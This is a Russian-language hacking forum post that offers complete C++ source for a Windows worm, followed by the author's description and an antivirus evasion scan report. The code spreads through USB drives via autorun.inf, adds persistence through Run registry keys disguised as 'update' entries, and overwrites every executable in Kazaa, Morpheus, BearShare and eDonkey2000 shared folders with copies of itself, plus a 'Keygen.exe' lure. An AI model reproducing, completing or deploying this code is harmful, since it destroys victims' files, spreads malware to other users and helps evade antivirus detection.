[C++] USB + P2P Worm

[IBM]

Всем привет. Червь является частичной доработкой этой штуки: /showthread.php?t=17028

Код:

#include "windows.h"
#include "stdio.h"
#include "shlobj.h"

typedef void (*LPSEARCHFUNC)(LPCTSTR lpszFileName);

HKEY key;
int count = 0;
char scount[3];

char selfPath[MAX_PATH]; 

BOOL DirectoryExists(const char* dirName) {
  DWORD attribs = ::GetFileAttributesA(dirName);
  if (attribs == INVALID_FILE_ATTRIBUTES) {
    return false;
  }
  return (attribs & FILE_ATTRIBUTE_DIRECTORY);
}

void infect(LPCTSTR lpszFileName)
  {
    DeleteFile(lpszFileName);
    CopyFile(selfPath, lpszFileName, true);
    char drive[3], path[MAX_PATH], target[MAX_PATH];
    _splitpath(lpszFileName, drive, path, 0, 0);
    strcpy(target, drive);
    strcat(target, path);
    strcat(target, "Keygen.exe");
    CopyFile(selfPath, target, false);
  }

BOOL SearchFiles(LPCTSTR lpszFileName, LPSEARCHFUNC lpSearchFunc, BOOL bInnerFolders = TRUE)
{
    LPTSTR part;
    char tmp[MAX_PATH]; 
    char name[MAX_PATH];

    HANDLE hSearch = NULL;
    WIN32_FIND_DATA wfd;
    memset(&wfd, 0, sizeof(WIN32_FIND_DATA));

    
    if(bInnerFolders)
    {
        if(GetFullPathName(lpszFileName, MAX_PATH, tmp, &part) == 0) return FALSE;
        strcpy(name, part);
        strcpy(part, "*.*");

        
        wfd.dwFileAttributes = FILE_ATTRIBUTE_DIRECTORY;
        if (!((hSearch = FindFirstFile(tmp, &wfd)) == INVALID_HANDLE_VALUE))
        do
        {
            if (!strncmp(wfd.cFileName, ".", 1) || !strncmp(wfd.cFileName, "..", 2))            
            continue;
        
            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                char next[MAX_PATH];
                if(GetFullPathName(lpszFileName, MAX_PATH, next, &part) == 0) return FALSE;
                strcpy(part, wfd.cFileName);
                strcat(next, "\\");
                strcat(next, name);

                SearchFiles(next, lpSearchFunc, TRUE);
            }
        }
        while (FindNextFile(hSearch, &wfd));

        FindClose (hSearch); 
    }

    if ((hSearch = FindFirstFile(lpszFileName, &wfd)) == INVALID_HANDLE_VALUE) 
        return TRUE;
    do
    if (!(wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) 
    {
        char file[MAX_PATH];
        if(GetFullPathName(lpszFileName, MAX_PATH, file, &part) == 0) return FALSE;
        strcpy(part, wfd.cFileName);

        lpSearchFunc(file);
    }
    while (FindNextFile(hSearch, &wfd));
    FindClose (hSearch); 

    return TRUE;
}


void p2p(LPCTSTR szhardvolume)
  {
    char kazaa[MAX_PATH], morpheus[MAX_PATH], bearshare[MAX_PATH], eDonkey2000[MAX_PATH];
    strcpy(kazaa, szhardvolume);
    strcpy(morpheus, szhardvolume);
    strcpy(bearshare, szhardvolume);
    strcpy(eDonkey2000, szhardvolume);
    strcat(kazaa, "\\program files\\kazaa\\my shared folder\\");
    strcat(morpheus, "\\program files\\morpheus\\my shared folder\\");
    strcat(bearshare, "\\program files\\bearshare\\shared\\");
    strcat(eDonkey2000, "\\program files\\eDonkey2000\\incoming\\");
    if (DirectoryExists(kazaa))
      {
        strcat(kazaa, "*.exe");
        SearchFiles(kazaa, infect, FALSE);  
      }
    if (DirectoryExists(morpheus))
      {
        strcat(morpheus, "*.exe");
        SearchFiles(morpheus, infect, FALSE);  
      }
    if (DirectoryExists(bearshare))
      {
        strcat(bearshare, "*.exe");
        SearchFiles(bearshare, infect, FALSE);  
      }
    if (DirectoryExists(eDonkey2000))
      {
        strcat(eDonkey2000, "*.exe");
        SearchFiles(eDonkey2000, infect, FALSE);  
      }
  }

void GetAll()
  {
    GetModuleFileName(0, selfPath, sizeof(selfPath));
  }
void InfectDisk(LPCTSTR autopath)
  {
    count++;
    char drive[3];
    char target[MAX_PATH];
    char name[24];
    _splitpath(autopath, drive, 0, 0, 0);
    FILE *file=fopen(autopath, "w");
    fprintf(file, "[autorun]\nOpen=setup.exe\n");
    fprintf(file, "icon=%%SystemRoot%%\\system32\\SHELL32.dll,4\n");
    fprintf(file, "action=Open folder to view files\n");
    fprintf(file, "shell\\open=Open\n");
    fprintf(file, "shell\\open\\command=setup.exe\n");
    fprintf(file, "shell\\open\\default=1\n");
    fclose(file);       
    strcpy(target, drive);
    strcat(target, "\\");
    strcat(target, "setup.exe");
    RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
    strcpy(name, "update_");
    itoa(count, scount, 10);
    strcat(name, scount);
    RegSetValueEx(key,name,0,REG_SZ,(BYTE *)target,sizeof(target));
    RegCloseKey(key); 
    CopyFile(selfPath, target, true); 
    p2p(drive);
  }



int main()
  {
    GetAll();
    for(;;)
      {
        char buf[26];
        const char *inffile = "autorun.inf"; 
        char *sname;
        GetLogicalDriveStringsA(sizeof(buf), buf);
        for (char *s = buf; *s; s+=strlen(s)+1) 
          {
            strcpy(sname, s);
            strcat(sname, inffile);    
            InfectDisk(sname);
          }
        count = 0;
        Sleep(15000);
      }  
  }

Добавлено:

Ищет P2P папки на каждом диске, если находит, то перезаписывает каждый расшаренный exe файл своей копией. И создает копию keygen.exe ( только если есть exe файлы )

Заражает следующие P2P сети:

kazaa
bearshare
morpheus
eDonkey2000

Название файла: main.exe
Размер файла: 24860 байт
Дата сканирования: Tue, 28 Jan 14 06:28:48 -0500
MD5-хэш файла: e54cf544016b1df5a8c293e8b2e3ee9d

Результат: 8 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: DeepScan:Generic.Malware.SN!.97E298A6
BullGuard Internet Security 2013: DeepScan:Generic.Malware.SN!.97E298A6
Comodo: OK
Dr.Web: WIN.WORM.Virus
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: DeepScan:Generic.Malware.SN!.97E298A6 (DB)
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: DeepScan:Generic.Malware.SN!.97E298A6
G Data: Virus: DeepScan:Generic.Malware.SN!.97E298A6 (Engine A)

IKARUS: OK
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: Worm:Win32/Autorun.gen!BT
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: BScope.Trojan-Spy.Zbot
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru